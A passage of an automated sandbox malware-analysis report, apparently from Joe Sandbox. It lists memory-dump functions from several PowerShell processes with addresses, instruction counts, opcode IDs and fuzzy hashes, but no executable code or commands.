                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6ebf149c35fbb045ea605bb571b2b6dc055391e675b75434ab616c368276cb77
                                                                            • Instruction ID: 32775cebbf7485daa7c0782560249fe6c4f70d78ed08cd7c9636dd7a593173e3
                                                                            • Opcode Fuzzy Hash: 6ebf149c35fbb045ea605bb571b2b6dc055391e675b75434ab616c368276cb77
                                                                            • Instruction Fuzzy Hash: 62811177D4D693CFF305A76CA86A4F53B54EF42315B08C972D08DCA1A3ED14A49D41D1
                                                                            Function 00007FFAAC579758 Relevance: .1, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0d84557480f133db3d0232e6c29c949144194562df1156737d8504ba8ae771e
                                                                            • Instruction ID: e2ee3a9ddb50231a74906f673cce9a967b53b36184b8421637e851ead59f6ec4
                                                                            • Opcode Fuzzy Hash: a0d84557480f133db3d0232e6c29c949144194562df1156737d8504ba8ae771e
                                                                            • Instruction Fuzzy Hash: 3331D97191CB488FEB58DF5CA8466E97BE0FB99311F00822FE44D93252DA70A955CBC2
                                                                            Function 00007FFAAC45E380 Relevance: .1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368486209.00007FFAAC45D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC45D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac45d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1caf930f0b21910a7611e459e41b9a51cf1fde4e4bf19931ad0ff0b1f7a1f358
                                                                            • Instruction ID: 6056b7792c3add3065daefa9d9958a9eff89f8682feb8d6c693d16de7c3bda11
                                                                            • Opcode Fuzzy Hash: 1caf930f0b21910a7611e459e41b9a51cf1fde4e4bf19931ad0ff0b1f7a1f358
                                                                            • Instruction Fuzzy Hash: C841E57180EBC88FE7568B2998459523FB0EF57314B1505EFD08CCB1A3D629EC4AC792
                                                                            Function 00007FFAAC57A47C Relevance: .1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d3aef7a7eae41482b3fa5ad8e0e9b739eda790d72b20a1f6d1244237c175918
                                                                            • Instruction ID: af52fcc5099b08596ec5b680df3f79c6c0484155a7df48d3fe7fa6f09aea6a0a
                                                                            • Opcode Fuzzy Hash: 0d3aef7a7eae41482b3fa5ad8e0e9b739eda790d72b20a1f6d1244237c175918
                                                                            • Instruction Fuzzy Hash: FE21F83190C74C8FDB59DB6C984A7F97BF0EB56321F04426BD049C3162DA74A45ACB91
                                                                            Function 00007FFAAC5733B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction ID: bee303c1f4efc301387659d61f640e7d41f0dbd1056ec0066b2a57676e6cd883
                                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                            • Instruction Fuzzy Hash: 9001677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45
                                                                            Function 00007FFAAC64414D Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f41aa219a95db5e75f8efc135200cb73252cf6ba043750b4a2e8497cb8049611
                                                                            • Instruction ID: 98fad44a6fa9f3938d1eeda5f9f0367ade697f0e132eceb1b5e7c0aab8b25d6d
                                                                            • Opcode Fuzzy Hash: f41aa219a95db5e75f8efc135200cb73252cf6ba043750b4a2e8497cb8049611
                                                                            • Instruction Fuzzy Hash: ABF09A32A0D9048FE669EB5CE5428B877E0EF5636071150BAE05EC75A3DE25EC45C780
                                                                            Function 00007FFAAC644400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a9f488187d3c0cd9392e1fe82b2a210667ef6a815f1d1451930baccbb8e42a45
                                                                            • Instruction ID: dc380cba1125bbff5b8d57a40e8dc992e243d9ac3144c927e7e16354fcaa7abe
                                                                            • Opcode Fuzzy Hash: a9f488187d3c0cd9392e1fe82b2a210667ef6a815f1d1451930baccbb8e42a45
                                                                            • Instruction Fuzzy Hash: 06F0BE32A0D5448FE755EB5CE4428A877E0EF06320B0150B6E14ECB863DE25EC44C780
                                                                            Function 00007FFAAC6441D1 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 5b26556ac9f6d81698c11dfb25d54ca3b06b608904ae503f88ca55104ebb7cfc
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: ECE01A31B0C808CFEA69DB0CE2419B973E1EB9932171161B7D14EC7561DA22EC559BC0

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC578995 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^$O_^$O_^$O_^
                                                                            • API String ID: 0-109995703
                                                                            • Opcode ID: cb98f664277115853659957bcbe671e2c85077d46fdf5f30a0bed13e92abe629
                                                                            • Instruction ID: eaf30d4da4c54d048ef435f650a703d7e27fc0ff641c15708c6c6b7b55a6058c
                                                                            • Opcode Fuzzy Hash: cb98f664277115853659957bcbe671e2c85077d46fdf5f30a0bed13e92abe629
                                                                            • Instruction Fuzzy Hash: 6441B19294F7D38FF75E435949650A03FE4EF53325B0D84F2E08D9B193E919A88A83D2
                                                                            Function 00007FFAAC5789FA Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: O_^$O_^$O_^$O_^
                                                                            • API String ID: 0-109995703
                                                                            • Opcode ID: 5c3b72d0229c64122c88b7d1b5e300894b127f705a5b5e34962c5f7fee8e7aaf
                                                                            • Instruction ID: 8fcb5f9b03f996eda3b28d86da86a2de9994009f0c3f3039be158aa4b85655f3
                                                                            • Opcode Fuzzy Hash: 5c3b72d0229c64122c88b7d1b5e300894b127f705a5b5e34962c5f7fee8e7aaf
                                                                            • Instruction Fuzzy Hash: 1831F49294F7E3CBFA4E431909540A02FD4FF53334B0C88F2E08DAB183ED19A88A42D1

                                                                            Executed Functions

                                                                            Function 00007FFAAC5A644D Relevance: .7, Instructions: 734COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6abd0984cf4b72532f34fffc7a7544f2a52f5cf72eea69fc6d00eb0d10dfede
                                                                            • Instruction ID: 3a3614cf99ad423b1b6898f1f88f6482474efffdd449ee300e3721195c3cb17d
                                                                            • Opcode Fuzzy Hash: b6abd0984cf4b72532f34fffc7a7544f2a52f5cf72eea69fc6d00eb0d10dfede
                                                                            • Instruction Fuzzy Hash: 21D15F30A58A4E8FEF88DF58C459AA97BE1FF59300F14816AE40DD7296CE34E845CBC1
                                                                            Function 00007FFAAC676605 Relevance: .4, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6b6be4a88c3a9c65ec78ebc72bf2c28d2dc9e58de04150ff61413f6f7276f79
                                                                            • Instruction ID: 8abfbba1eced2201104748e12491b96405c061510dba6de1e570ec47d8ee6387
                                                                            • Opcode Fuzzy Hash: f6b6be4a88c3a9c65ec78ebc72bf2c28d2dc9e58de04150ff61413f6f7276f79
                                                                            • Instruction Fuzzy Hash: 3DD14561D0EB9A8FFB96DB2888155B97FA2EF46310B0855FED44DC70D3DA18D809C392
                                                                            Function 00007FFAAC5AA828 Relevance: .3, Instructions: 274COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7fdbdc24209e0f0af3d6d056789f6dca9fbd720f4083553df789a628a859ca6
                                                                            • Instruction ID: 6594dc97401e7fdece22a500506e12be768ad6c4d028539eb73e2a635ecdbd5f
                                                                            • Opcode Fuzzy Hash: b7fdbdc24209e0f0af3d6d056789f6dca9fbd720f4083553df789a628a859ca6
                                                                            • Instruction Fuzzy Hash: B091263250C7868FE346D739885D5A57FE0EF87328B0842EED099C71A3EA269406C7D1
                                                                            Function 00007FFAAC5A9EF3 Relevance: .3, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d7d6099fbbf7141264e06c8acaa79448807a397d62d882d4bc541205f9a532e5
                                                                            • Instruction ID: f1a8590ec52ad74e82660a8e9bfd8e8409ecbf2610248638b1dc148fe5fddbb8
                                                                            • Opcode Fuzzy Hash: d7d6099fbbf7141264e06c8acaa79448807a397d62d882d4bc541205f9a532e5
                                                                            • Instruction Fuzzy Hash: DA81FA6384D7C38FE312977D9C694E93F90EF5322870882F7E0D88A1A3ED14944A97D1
                                                                            Function 00007FFAAC5A96D3 Relevance: .2, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b8db0645dec075007a3730e5554cbf52cd6de5414fd4437d3a92d0468df04e0
                                                                            • Instruction ID: e4f7e5c2baa30c7e8e21f7fd31bdd55b2c64f6d6af2ace6dc10b92bfb4b6e2d8
                                                                            • Opcode Fuzzy Hash: 2b8db0645dec075007a3730e5554cbf52cd6de5414fd4437d3a92d0468df04e0
                                                                            • Instruction Fuzzy Hash: 0B7127A294DBD68FF7159B2D6C191E97FA0EF57710F0881BBE08C87193DA14A80987D2
                                                                            Function 00007FFAAC5A9885 Relevance: .2, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c877b884d0045be7275473f25e35e6c34d48521b4654d77617946f2d82b1116
                                                                            • Instruction ID: 5572d283e5a525efa55617abfa599b5de28cf394f1a27adf8d6bcf5d2040279b
                                                                            • Opcode Fuzzy Hash: 9c877b884d0045be7275473f25e35e6c34d48521b4654d77617946f2d82b1116
                                                                            • Instruction Fuzzy Hash: 7451993191CB498FDB1C9F5CA8466A8BBE0FB95721F00822FE04993651CB75A456CBC2
                                                                            Function 00007FFAAC5AA73C Relevance: .1, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60d7f8e62f8a24aea7ef48d66d13aacbd06752b6ac8a6fc10a03f1a1625883b7
                                                                            • Instruction ID: 534a461bc250bb9707efc7e57b1fd49641c496bce89d6b91de79918965e650f4
                                                                            • Opcode Fuzzy Hash: 60d7f8e62f8a24aea7ef48d66d13aacbd06752b6ac8a6fc10a03f1a1625883b7
                                                                            • Instruction Fuzzy Hash: 6E31273190DB898FEB59DB68984A6FA7FE0EB52320F0481BFD04DC7153D965980ACB91
                                                                            Function 00007FFAAC48EC0A Relevance: .1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1459641117.00007FFAAC48D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC48D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac48d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56c58b8c706456dbb3f5d3f38712339ec276572bc428fb3bd3fd2e7c47f3942d
                                                                            • Instruction ID: dd8c37a23c21d7f6340427b0108d5e616ded9257bbf1902adf43670635b07945
                                                                            • Opcode Fuzzy Hash: 56c58b8c706456dbb3f5d3f38712339ec276572bc428fb3bd3fd2e7c47f3942d
                                                                            • Instruction Fuzzy Hash: E111A33190DF08CFAB58EF2DE4899627BE1FB84324710469ED42DCB166D630E845CB95
                                                                            Function 00007FFAAC5A33B5 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction ID: 17302f02100e042e775f8c479ef8fc3f79d1b0800815a9ab55274fce78478d2f
                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                            • Instruction Fuzzy Hash: 7F01677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056EE58AC3661DA36E882CB45
                                                                            Function 00007FFAAC67414D Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2c0ece47a71015d792c6a80913c5418856640d5d04ff375c2e143ba0b647309
                                                                            • Instruction ID: 7485df57bcc80b3cbb598a0832dff1692d43208f839ac1e0e9b472c5095faa29
                                                                            • Opcode Fuzzy Hash: a2c0ece47a71015d792c6a80913c5418856640d5d04ff375c2e143ba0b647309
                                                                            • Instruction Fuzzy Hash: 78F0BE32A0D5048FE769EB5CE4458B877E1EF5632071150BAE05DC75A3CE25EC44CB80
                                                                            Function 00007FFAAC674400 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3296ecb02cfe1bbad376c72e91bbd249627807730a20d99f496824b6dc3941f
                                                                            • Instruction ID: 7f14f9aeb439d1650a7f7ae6479b4d04b047a040572fe7bc02b9b70b3479448d
                                                                            • Opcode Fuzzy Hash: a3296ecb02cfe1bbad376c72e91bbd249627807730a20d99f496824b6dc3941f
                                                                            • Instruction Fuzzy Hash: B9F0E232A0D5448FE755EB1CE4458A877E0FF06320B1150F6E04DCB463CE25EC54CB80
                                                                            Function 00007FFAAC6741D1 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460952928.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac670000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: a51f642805fac1c5fa909f634fc3912e354b40176132437dc51191082ab1d2b3
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: 1EE01A31B0C818CFEA69EB0CE0449B973E6EB9933171165B7D14EC7561DA22EC559BC0

                                                                            Non-executed Functions

                                                                            Function 00007FFAAC5A8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L_^5$L_^8$L_^F$L_^I$L_^K
                                                                            • API String ID: 0-3847582561
                                                                            • Opcode ID: b0851bed124db4d367917b27cd62f069190bd9d6d5e64ce8e97aca01ef74c68e
                                                                            • Instruction ID: 73e4a9cc0bfda8a440722697f2aa9f036fc7e9d4d19acd1d1024c346c80e7f27
                                                                            • Opcode Fuzzy Hash: b0851bed124db4d367917b27cd62f069190bd9d6d5e64ce8e97aca01ef74c68e
                                                                            • Instruction Fuzzy Hash: 182104B771C1169E92017B7EBC199ED7784CF98275349D2B2D3988F623DE14608A8AD0
                                                                            Function 00007FFAAC5A8535 Relevance: 6.3, Strings: 5, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.1460282250.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffaac5a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: L_^$L_^$L_^$L_^$L_^
                                                                            • API String ID: 0-2264858084
                                                                            • Opcode ID: baa22ecd929014af9818b4dbd3945ab8ed61d091777445fe7f6bcc00147c8d0c
                                                                            • Instruction ID: 1b95e61cd839f16b07fc0c6f9a7574f6b544e2ea71e0a2ddadaf20c2d23f1aff
                                                                            • Opcode Fuzzy Hash: baa22ecd929014af9818b4dbd3945ab8ed61d091777445fe7f6bcc00147c8d0c
                                                                            • Instruction Fuzzy Hash: 08217F93D1E7C34EE357437A086D0556F90EE5722874E83E7C0E84B0E3EA28840AD395

                                                                            Executed Functions

                                                                            Function 00007FFAAC68660A Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X7s
                                                                            • API String ID: 0-1336388102
                                                                            • Opcode ID: 7640c80e2f702364a36bab8c2f21e527caad4badfced618273e0a64aa69d5644
                                                                            • Instruction ID: a2912545a354bba3d8659e73a17db9a8ea954059e4fdfb09f8fb3213644fa2f5
                                                                            • Opcode Fuzzy Hash: 7640c80e2f702364a36bab8c2f21e527caad4badfced618273e0a64aa69d5644
                                                                            • Instruction Fuzzy Hash: FDC14861A1EACA8FFB66EB2888155B57BE1EF46310F0851BED44DC70D3DE18D90883D2
                                                                            Function 00007FFAAC68664B Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X7s
                                                                            • API String ID: 0-1336388102
                                                                            • Opcode ID: 43c1d14ab99ef307c7872a65d768da5a150e524560121f16e43dbeaaefef50d8
                                                                            • Instruction ID: e3520382be7d531bf3b2c50bd7a8c634381597495cb1b86943b1ead93a0f2c69
                                                                            • Opcode Fuzzy Hash: 43c1d14ab99ef307c7872a65d768da5a150e524560121f16e43dbeaaefef50d8
                                                                            • Instruction Fuzzy Hash: D881F3A6A1FAC68FFBA6D72848555746A91EF42310F58A0BED44DCB0C3DE18DD4883D2
                                                                            Function 00007FFAAC5B644D Relevance: .7, Instructions: 661COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0cf18f30d2bdfdca9531c4bcfd0f94dd73e5ba3948f0668b9a025db9264300b
                                                                            • Instruction ID: 59a0b338ff740f3caca21e28208f2e56eeb4e2323e6a85b4d6f408f7c1301a5e
                                                                            • Opcode Fuzzy Hash: b0cf18f30d2bdfdca9531c4bcfd0f94dd73e5ba3948f0668b9a025db9264300b
                                                                            • Instruction Fuzzy Hash: 3DC16F30A18A4A8FEF89EF58C455AA97BE1FF59300F14816AE40DD7296DE34E845CBC1
                                                                            Function 00007FFAAC684073 Relevance: .2, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 48a728e6720239d26b5776f3ec553419dfe820477b0b718961ce5d46c2cf38f0
                                                                            • Instruction ID: 18d9635d8bb3216bd0f4b2990273c32d9609462209d9db2281ec113edc288297
                                                                            • Opcode Fuzzy Hash: 48a728e6720239d26b5776f3ec553419dfe820477b0b718961ce5d46c2cf38f0
                                                                            • Instruction Fuzzy Hash: 48512A32A0DA868FF79ADB3C44616757BD2DF96210B59A0BEC18EC7193DF14ED098381
                                                                            Function 00007FFAAC684370 Relevance: .1, Instructions: 146COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1676944775.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac680000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c23abe78ef26463f32a2f2a722768dbf9d0d10fbf74a49f794b384ca209264d5
                                                                            • Instruction ID: 254ae0344d94691cf7e183c8c5165db10e69f34fb0831e6bece36810f26adf20
                                                                            • Opcode Fuzzy Hash: c23abe78ef26463f32a2f2a722768dbf9d0d10fbf74a49f794b384ca209264d5
                                                                            • Instruction Fuzzy Hash: 11412C32A0EA498FF7A6D77C94619B47BD1EF46320B0864BAC24DC7193DE14ED0983C1
                                                                            Function 00007FFAAC5B9758 Relevance: .1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1668950680.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_7ffaac5b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a81d4bf31db40ef8f52bb6b9b270bdc04299948dca31dc526b7e63fdd457287
                                                                            • Instruction ID: 0b48656a225c0186c7553bfa7d521e58b91f96262b0f4210edf747d7dc69a59f
